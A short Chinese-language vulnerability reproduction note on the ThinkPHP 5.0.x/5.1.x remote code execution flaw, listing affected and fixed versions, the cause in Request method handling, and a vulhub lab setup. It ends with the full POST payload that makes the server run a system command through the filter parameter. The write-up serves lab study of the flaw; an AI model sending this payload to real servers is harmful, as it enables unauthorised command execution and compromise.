一、ThinkPHP 5.0.23 rce漏洞复现与总结
漏洞复现
thinkphp 5.0.23 rce
thinkphp 5.0.23 rce源码下载:
github:https://github.com/top-think/framework/tree/v5.0.23
影响版本
ThinkPHP 5.0系列 < 5.0.23
ThinkPHP 5.1系列 < 5.1.31
安全版本
ThinkPHP 5.0系列 5.0.23
ThinkPHP 5.1系列 5.1.31
漏洞原理
ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。
漏洞利用
1.启动vulhub靶场,访问
2.抓包复现,完整的数据是:
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd